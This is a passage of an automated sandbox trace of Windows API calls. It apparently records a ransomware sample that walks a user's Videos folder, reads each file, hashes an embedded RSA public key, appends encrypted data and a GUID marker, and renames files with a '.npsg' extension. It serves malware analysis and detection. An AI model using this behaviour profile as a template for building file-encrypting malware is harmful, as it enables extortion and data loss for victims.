KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0245.821] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0245.821] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a220) returned 1 [0245.822] CryptCreateHash (in: hProv=0x67a220, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0245.823] CryptHashData (hHash=0x33f0488, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0245.823] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0245.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0245.823] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0245.823] GetLastError () returned 0x0 [0245.823] CryptDestroyHash (hHash=0x33f0488) returned 1 [0245.823] CryptReleaseContext (hProv=0x67a220, dwFlags=0x0) returned 1 [0245.823] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0245.823] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0245.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0245.823] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0245.823] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0245.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8ccd0 [0245.824] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x6222, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.824] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0245.824] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0245.824] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0245.824] CloseHandle (hObject=0x644) returned 1 [0245.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0245.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8d0) returned 0x3b8ccd0 [0245.826] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\FVtB8RwkjP B1jt\\tJ1P.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\arnu9pmgj4v\\fvtb8rwkjp b1jt\\tj1p.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\FVtB8RwkjP B1jt\\tJ1P.mkv.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\arnu9pmgj4v\\fvtb8rwkjp b1jt\\tj1p.mkv.npsg")) returned 1 [0245.828] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77bb3c20, ftCreationTime.dwHighDateTime=0x1d5c0c4, ftLastAccessTime.dwLowDateTime=0xbaa90910, ftLastAccessTime.dwHighDateTime=0x1d5ba14, ftLastWriteTime.dwLowDateTime=0xbaa90910, ftLastWriteTime.dwHighDateTime=0x1d5ba14, nFileSizeHigh=0x0, nFileSizeLow=0x1761d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uP0hZVzrxky5Xvj.flv", cAlternateFileName="UP0HZV~1.FLV")) returned 1 [0245.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0245.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x106) returned 0x3b7b948 [0245.828] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\FVtB8RwkjP B1jt\\uP0hZVzrxky5Xvj.flv") returned=".flv" [0245.828] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\FVtB8RwkjP B1jt\\uP0hZVzrxky5Xvj.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\arnu9pmgj4v\\fvtb8rwkjp b1jt\\up0hzvzrxky5xvj.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0245.828] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=95773) returned 1 [0245.829] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39b0000 [0245.831] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x175f7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.831] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0245.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0245.833] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb70*=0x1761d, lpOverlapped=0x0) returned 1 [0245.835] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0245.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0245.835] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0245.835] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0245.835] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a220) returned 1 [0245.836] CryptCreateHash (in: hProv=0x67a220, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0245.836] CryptHashData (hHash=0x33f0488, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0245.836] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0245.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0245.836] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0245.836] GetLastError () returned 0x0 [0245.836] CryptDestroyHash (hHash=0x33f0488) returned 1 [0245.836] CryptReleaseContext (hProv=0x67a220, dwFlags=0x0) returned 1 [0245.836] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0245.836] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0245.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0245.837] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0245.837] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0245.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8ccd0 [0245.838] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1761d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.838] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0245.839] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0245.839] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0245.839] CloseHandle (hObject=0x644) returned 1 [0245.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8bce8 [0245.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e0) returned 0x3b8ccd0 [0245.841] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\FVtB8RwkjP B1jt\\uP0hZVzrxky5Xvj.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\arnu9pmgj4v\\fvtb8rwkjp b1jt\\up0hzvzrxky5xvj.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\FVtB8RwkjP B1jt\\uP0hZVzrxky5Xvj.flv.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\arnu9pmgj4v\\fvtb8rwkjp b1jt\\up0hzvzrxky5xvj.flv.npsg")) returned 1 [0245.843] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77bb3c20, ftCreationTime.dwHighDateTime=0x1d5c0c4, ftLastAccessTime.dwLowDateTime=0xbaa90910, ftLastAccessTime.dwHighDateTime=0x1d5ba14, ftLastWriteTime.dwLowDateTime=0xbaa90910, ftLastWriteTime.dwHighDateTime=0x1d5ba14, nFileSizeHigh=0x0, nFileSizeLow=0x1761d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uP0hZVzrxky5Xvj.flv", cAlternateFileName="UP0HZV~1.FLV")) returned 0 [0245.843] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0245.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0245.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393c58 | out: hHeap=0x620000) returned 1 [0245.843] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0245.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0245.843] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0245.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0245.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0245.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0245.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0245.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0245.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0245.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0245.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0245.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0245.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0245.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0245.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0245.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0245.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0245.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0245.848] HeapFree (in: 